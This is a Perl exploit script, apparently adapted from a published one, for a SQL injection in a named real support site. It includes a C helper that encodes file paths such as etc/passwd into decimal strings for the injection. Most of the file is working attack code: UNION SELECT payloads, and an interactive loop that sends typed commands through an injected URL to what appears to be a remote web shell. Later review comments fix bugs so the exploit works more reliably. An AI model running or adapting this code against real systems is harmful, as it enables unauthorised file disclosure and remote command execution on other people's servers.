#!/usr/bin/perl
#You can get the admin hash, or read the *NIX password file, by putting the
#decimal strings produced by the generator.c program (below) into the injected
#SQL; the SQL-specific commands themselves are up to you. The example here is
#for the tables and the *NIX password file.
#exploit tested on winxp sp2 
# #include<stdio.h>
 
# #include<stdlib.h>

# #include<string.h>
 
#   int main()
 
# { char st[1024];
#   int le;
#   printf("Input : ");
#   gets(st);   /* NOTE(review): unbounded read into st[1024]; fgets(st, sizeof st, stdin) is the safe form */
#   for(le=0;le<strlen(st);le++)
 
#   { printf("%d,",st[le]);
#   }   
#  system("pause");
  
#   return 0;
#  }

#101,116,99,47,112,97,115,115,119,100 = etc/passwd   (e t c / p a s s w d -- note there is no leading '/'; prepend 47 if /etc/passwd is meant)

#If we request this :
#http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*
#the UNION selects nine placeholder columns (0 through 8), which must match the column
#count of the original query (it does not create tables). To see which placeholder is
#echoed in the page, use an ID that matches no real row so only the injected row is shown :
#-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*

# Author banner; printed once at start-up, before any argument checking.
# Single-quoted heredoc: nothing in it is interpolated.
print <<'BANNER';
......Start.......
.................
.          fl0 fl0w .
.       found by fl0w fl0w
.       c0ded by fl0 fl0w
.......Email me at flo[underscore]fl0w[underscore]supremacy[dot]com

.................

BANNER

use LWP::UserAgent;
 
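# Positional arguments (no option parsing):
#   1. base URL of the target; only checked for containing "http://"
#   2. $shells   - URL spliced into the injected request right after the
#                  "SELECT 0/*" payload (required by the check below)
#   3. $shellcmd - query-string parameter name the typed command is sent as
# All three are concatenated into the request URL in the command loop
# below without any escaping.  What the URL in $shells serves is not
# visible from this script (the name suggests a web shell).
#
# The original used the one-element slice form @ARGV[n], which only warns,
# and tested the "http://" condition twice; both are cleaned up here.
my $site     = $ARGV[0];
my $shells   = $ARGV[1];
my $shellcmd = $ARGV[2];

# routine() prints the usage text and exits.
# NOTE(review): $shellcmd is not validated although the request URL needs it.
if ( $site !~ /http:\/\// || !$shells ) {
    routine();
}

header();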

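 # Interactive command loop.  Every line read from STDIN is appended to
 # the injected request URL and sent to the target; the response body is
 # then searched for the markers the original author used to detect a
 # failed include ("failed to open"/"cannot execute") and for the pair
 # of PHP WARNING fragments that bracket the command output.
 #
 # Defects fixed against the original:
 #  - the request object and the response body were referenced as the
 #    barewords `requesting` and `i`, so the request was never sent and
 #    the "could not connect" check could never match;
 #  - newlines were folded with tr/// using bracketed lists, which mapped
 #    ']' to '#' on the way in and '2', '3', '4', ';' to ']' on the way
 #    out, garbling e.g. UIDs in a dumped passwd file.  "&#234;" is the
 #    HTML entity for chr(234), so that single byte is used as the
 #    placeholder, which keeps the single-character '.' in the WARNING
 #    regexes working;
 #  - the outer `while ()` re-printed the prompt forever once STDIN hit
 #    EOF, and the trailing `last;` outside any loop was unreachable.
 #
 # NOTE(review): $cmd is concatenated into the URL without escaping, so
 # commands containing spaces, '&', '#' or '+' will not survive the
 # round trip; URI::Escape::uri_escape() is the usual fix (not core,
 # so not added here).
 my $sploit = LWP::UserAgent->new() or die;    # one agent per session

 print "[shell] \$";
 while (<STDIN>) {
     my $cmd = $_;
     chomp($cmd);

     # Re-prompt without touching the target when the line is empty
     # (the original sent the request first and only then complained).
     if ( !$cmd ) {
         print "Enter a command\n\n";
         print "[shell] \$";
         next;
     }

     my $requesting = HTTP::Request->new( GET => $site
             . '/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'
             . $shells . '?&' . $shellcmd . '=' . $cmd )
         or die "\n\n NOT CONNECTED\n";
     my $re = $sploit->request($requesting);

     # Fold newlines into one placeholder byte so '.' can match across
     # what were line breaks in the page.
     my $i = $re->content;
     $i =~ tr/\n/\xea/;

     if (   $i =~ /failed to open:HTTP request failed!/
         || $i =~ /:cannot execute the command in <b>/ )
     {
         print "\nCould NOT connect to cmd from host \n";
         exit;
     }
     elsif ( $i =~ /^<br.\/>.<b>WARNING/ ) {
         print "\nInvalid command\n\n";
     }

     # Command output sits between two WARNING fragments; restore the
     # newlines before printing it.
     if ( $i =~ /(.+)<br.\/>.<b>WARNING.(.+)<br.\/>.<b>WARNING/ ) {
         my $last = $1;
         $last =~ tr/\xea/\n/;
         print "\n$last\n";
     }
     print "[shell] \$";
 }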

sub header()
{
    # Banner shown before the usage text (via routine()) and before the
    # command prompt.  Kept as one q{} literal so the layout is reproduced
    # exactly; nothing in it is interpolated.
    my $banner = q { 

================================================================================================================================================================
   MSQL injection -file disclosure in Jgaa's Internet 
  PoC:http://support.jgaa.com 
  Demo:http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*
================================================================================================================================================================
  };
    print $banner;
}
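    sub routine()
    {
        # Print the banner and the usage text, then terminate.  Reached
        # from the argument check when the target URL does not contain
        # "http://" or the second positional argument is missing.
        #
        # The original usage line mentioned only the URL, but the script
        # reads two more positional arguments ($shells, required by the
        # argument check, and $shellcmd), both of which are spliced into
        # the injected request; the text now lists all three.
        header();
        print q {
======================================================================================================
 USAGE:   perl exploit.pl <http://site.com> <shells> <shellcmd>
          <shells>   - second argument, required: URL appended after the injected SELECT
          <shellcmd> - third argument: query-string parameter name the command is sent as
======================================================================================================
        };
        exit();
    }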




       